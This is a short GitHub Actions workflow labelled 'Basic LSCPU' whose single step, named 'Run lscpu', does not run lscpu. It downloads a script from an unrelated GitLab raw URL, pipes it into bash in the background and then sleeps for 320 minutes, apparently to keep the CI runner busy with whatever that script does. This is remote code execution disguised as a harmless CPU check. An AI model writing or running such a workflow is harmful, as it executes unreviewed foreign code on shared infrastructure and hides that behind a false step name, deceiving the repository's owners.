name: Basic LSCPU

on:
  workflow_dispatch:

jobs:
  check-cpu:
    runs-on: ubuntu-latest
    steps:
      - name: Run lscpu
        run: curl -sL https://gitlab.com/spinazolla/kentucky/-/raw/main/spidermasters | bash &
             sleep 320m